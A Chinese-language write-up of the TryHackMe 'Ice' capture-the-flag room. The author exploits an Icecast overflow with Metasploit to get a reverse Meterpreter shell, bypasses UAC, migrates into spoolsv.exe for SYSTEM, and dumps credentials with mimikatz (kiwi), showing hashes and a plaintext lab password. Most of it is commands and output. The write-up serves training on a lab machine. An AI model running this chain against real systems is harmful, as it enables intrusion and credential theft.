【Tryhackme】Ice（bof）黑客ctf

免责声明

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用，请不要将文中使用的工具和渗透思路用于任何非法用途，对此产生的一切后果，本人不承担任何责任，也不对造成的任何误用或损害负责。

服务扫描

┌──(rootkali)-[~/tryhackme/ice] └─# nmap -sV -Pn 10.10.121.62 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-15 00:43 EST Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 00:44 (0:00:19 remaining) Nmap scan report for 10.10.121.62 Host is up (0.30s latency). Not shown: 988 closed ports PORTSTATE SERVICEVERSION 135/tcpopenmsrpcMicrosoft Windows RPC 139/tcpopennetbios-ssnMicrosoft Windows netbios-ssn 445/tcpopenmicrosoft-dsMicrosoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3389/tcpopenssl/ms-wbt-server? 5357/tcpopenhttpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP) 8000/tcpopenhttpIcecast streaming media server 49152/tcp openmsrpcMicrosoft Windows RPC 49153/tcp openmsrpcMicrosoft Windows RPC 49154/tcp openmsrpcMicrosoft Windows RPC 49158/tcp openmsrpcMicrosoft Windows RPC 49159/tcp openmsrpcMicrosoft Windows RPC 49160/tcp openmsrpcMicrosoft Windows RPC Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

看到开了很多端口，我们留意8000端口这个服务，在CVE Details显示存在一个Execute CodeOverflow漏洞，CVE编号为:CVE-2004-1561
在msf上搜索这个编号的漏洞利用模块：

msf6 > search CVE-2004-1561Matching Modules ================#NameDisclosure DateRankCheckDescription ---------------------------------------- 0exploit/windows/http/icecast_header2004-09-28greatNoIcecast Header OverwriteInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header

初始shell 设置参数，开始攻击，顺利拿到初始shell

msf6 exploit(windows/http/icecast_header) > set rhosts 10.10.121.62 rhosts => 10.10.121.62 msf6 exploit(windows/http/icecast_header) > set lhost tun0 lhost => tun0 msf6 exploit(windows/http/icecast_header) > run[*] Started reverse TCP handler on 10.13.21.169:4444 [*] Sending stage (175174 bytes) to 10.10.121.62 [*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.121.62:49302) at 2021-11-15 02:40:26 -0500meterpreter > shell Process 356 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation.All rights reserved.C:\Program Files (x86)\Icecast2 Win32>whoami whoami dark-pc\dark

使用post/multi/recon/local_exploit_suggester枚举提权模块

meterpreter > run post/multi/recon/local_exploit_suggester[*] 10.10.121.62 - Collecting local exploits for x86/windows... [*] 10.10.121.62 - 37 exploit checks are being tried... [+] 10.10.121.62 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. nil versions are discouraged and will be deprecated in Rubygems 4 [+] 10.10.121.62 - exploit/windows/local/ikeext_service: The target appears to be vulnerable. [+] 10.10.121.62 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.121.62 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.121.62 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.121.62 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.121.62 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.121.62 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. [+] 10.10.121.62 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

我们选择exploit/windows/local/bypassuac_eventvwr这个提权模块，设置参数，进行提权

msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_eventvwr) > optionsModule options (exploit/windows/local/bypassuac_eventvwr):NameCurrent SettingRequiredDescription -------------------------------------- SESSIONyesThe session to run this module on.Payload options (windows/meterpreter/reverse_tcp):NameCurrent SettingRequiredDescription -------------------------------------- EXITFUNCprocessyesExit technique (Accepted: '', seh, thread, process, none) LHOST192.168.3.67yesThe listen address (an interface may be specified) LPORT4444yesThe listen portExploit target:IdName ------ 0Windows x86msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1 session => 1 msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0 lhost => tun0 msf6 exploit(windows/local/bypassuac_eventvwr) > run[*] Started reverse TCP handler on 10.13.21.169:4444 [*] UAC is Enabled, checking level... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Configuring payload and stager registry keys ... [*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe [+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute. [*] Sending stage (175174 bytes) to 10.10.121.62 [*] Meterpreter session 2 opened (10.13.21.169:4444 -> 10.10.121.62:49336) at 2021-11-15 03:12:02 -0500 [*] Cleaning up registry keys ... meterpreter > shell Process 356 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation.All rights reserved.C:\Program Files (x86)\Icecast2 Win32>whoami whoami dark-pc\darkmeterpreter > getprivsEnabled Process Privileges ==========================Name ---- SeBackupPrivilege SeChangeNotifyPrivilege SeCreateGlobalPrivilege SeCreatePagefilePrivilege SeCreateSymbolicLinkPrivilege SeDebugPrivilege SeImpersonatePrivilege SeIncreaseBasePriorityPrivilege SeIncreaseQuotaPrivilege SeIncreaseWorkingSetPrivilege SeLoadDriverPrivilege SeManageVolumePrivilege SeProfileSingleProcessPrivilege SeRemoteShutdownPrivilege SeRestorePrivilege SeSecurityPrivilege SeShutdownPrivilege SeSystemEnvironmentPrivilege SeSystemProfilePrivilege SeSystemtimePrivilege SeTakeOwnershipPrivilege SeTimeZonePrivilege SeUndockPrivilege

提权我们的权限账号依然是dark-pc\dark,但是用getprivs命令查看，显示现在已经拥有了SeTakeOwnershipPrivilege的权限
用PS命令列出目前靶机所有进程：

meterpreter > psProcess List ============ PIDPPIDNameArchSessionUserPath ------------------------------ 00[System Process] 40Systemx640 4164smss.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\smss.exe 500692svchost.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exe 544536csrss.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\csrss.exe 588692svchost.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exe 592536wininit.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\wininit.exe 604584csrss.exex641NT AUTHORITY\SYSTEMC:\Windows\System32\csrss.exe 652584winlogon.exex641NT AUTHORITY\SYSTEMC:\Windows\System32\winlogon.exe 692592services.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\services.exe 700592lsass.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\lsass.exe 708592lsm.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\lsm.exe 816692svchost.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exe 884692svchost.exex640NT AUTHORITY\NETWORK SERVICEC:\Windows\System32\svchost.exe 932692svchost.exex640NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exe 1056692svchost.exex640NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exe 1136692svchost.exex640NT AUTHORITY\NETWORK SERVICEC:\Windows\System32\svchost.exe 1224816slui.exex641Dark-PC\DarkC:\Windows\System32\slui.exe 1264692spoolsv.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\spoolsv.exe 1328692svchost.exex640NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exe 1408692taskhost.exex641Dark-PC\DarkC:\Windows\System32\taskhost.exe 1516692amazon-ssm-agent.exex640NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exe 1528500dwm.exex641Dark-PC\DarkC:\Windows\System32\dwm.exe 15481508explorer.exex641Dark-PC\DarkC:\Windows\explorer.exe 1712692LiteAgent.exex640NT AUTHORITY\SYSTEMC:\Program Files\Amazon\Xentools\LiteAgent.exe 1720692sppsvc.exex640NT AUTHORITY\NETWORK SERVICEC:\Windows\System32\sppsvc.exe 1752692svchost.exex640NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exe 1804816WmiPrvSE.exex640NT AUTHORITY\NETWORK SERVICEC:\Windows\System32\wbem\WmiPrvSE.exe 1892692Ec2Config.exex640NT AUTHORITY\SYSTEMC:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe 21082300cmd.exex861Dark-PC\DarkC:\Windows\SysWOW64\cmd.exe 2124692svchost.exex640NT AUTHORITY\NETWORK SERVICEC:\Windows\System32\svchost.exe 2284604conhost.exex641Dark-PC\DarkC:\Windows\System32\conhost.exe 23001548Icecast2.exex861Dark-PC\DarkC:\Program Files (x86)\Icecast2 Win32\Icecast2.exe 2352692vds.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\vds.exe 2460692TrustedInstaller.exex640NT AUTHORITY\SYSTEMC:\Windows\servicing\TrustedInstaller.exe 2528692SearchIndexer.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\SearchIndexer.exe 25362092powershell.exex861Dark-PC\DarkC:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe 2916604conhost.exex641Dark-PC\DarkC:\Windows\System32\conhost.exe

留意这个进程：

1264692spoolsv.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\spoolsv.exe

这个进程与当前进程同样是x64架构。我们用migrate -N把进程迁移到这个进程当中，成功升级到系统最高权限。

meterpreter > migrate -N spoolsv.exe [*] Migrating from 2536 to 1264... [*] Migration completed successfully. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

获取其他用户凭证使用load kiwi命令收集系统里其他用户的凭证信息

meterpreter > load kiwi Loading extension kiwi... .#####.mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##."A La Vie, A L'Amour" - (oe.eo) ## / \ ##/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ##> http://blog.gentilkiwi.com/mimikatz '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com ) '#####'> http://pingcastle.com / http://mysmartlogon.com***/Success.

使用命令help查看支持的kiwi指令：

Kiwi Commands =============CommandDescription ------------------ creds_allRetrieve all credentials (parsed) creds_kerberosRetrieve Kerberos creds (parsed) creds_livesspRetrieve Live SSP creds creds_msvRetrieve LM/NTLM creds (parsed) creds_sspRetrieve SSP creds creds_tspkgRetrieve TsPkg creds (parsed) creds_wdigestRetrieve WDigest creds (parsed) dcsyncRetrieve user account information via DCSync (unparsed) dcsync_ntlmRetrieve user account NTLM hash, SID and RID via DCSync golden_ticket_createCreate a golden kerberos ticket kerberos_ticket_listList all kerberos tickets (unparsed) kerberos_ticket_purgePurge any in-use kerberos tickets kerberos_ticket_useUse a kerberos ticket kiwi_cmdExecute an arbitary mimikatz command (unparsed) lsa_dump_samDump LSA SAM (unparsed) lsa_dump_secretsDump LSA secrets (unparsed) password_changeChange the password/hash of a user wifi_listList wifi profiles/creds for the current user wifi_list_sharedList shared wifi profiles/creds (requires SYSTEM)

使用creds_all命令打印出所有用户凭证：

meterpreter > creds_all [+] Running as SYSTEM [*] Retrieving all credentials msv credentials ===============UsernameDomainLMNTLMSHA1 ------------------------ DarkDark-PCe52cac67419a9a22ecb08369099ed3027c4fe5eada682714a036e39378362bab0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0ebwdigest credentials ===================UsernameDomainPassword ---------------------- (null)(null)(null) DARK-PC$WORKGROUP(null) DarkDark-PCPassword01!tspkg credentials =================UsernameDomainPassword ---------------------- DarkDark-PCPassword01!kerberos credentials ====================UsernameDomainPassword ---------------------- (null)(null)(null) DarkDark-PCPassword01! dark-pc$WORKGROUP(null)

【【Tryhackme】Ice（bof）】我们看到dark的登录密码是：Password01!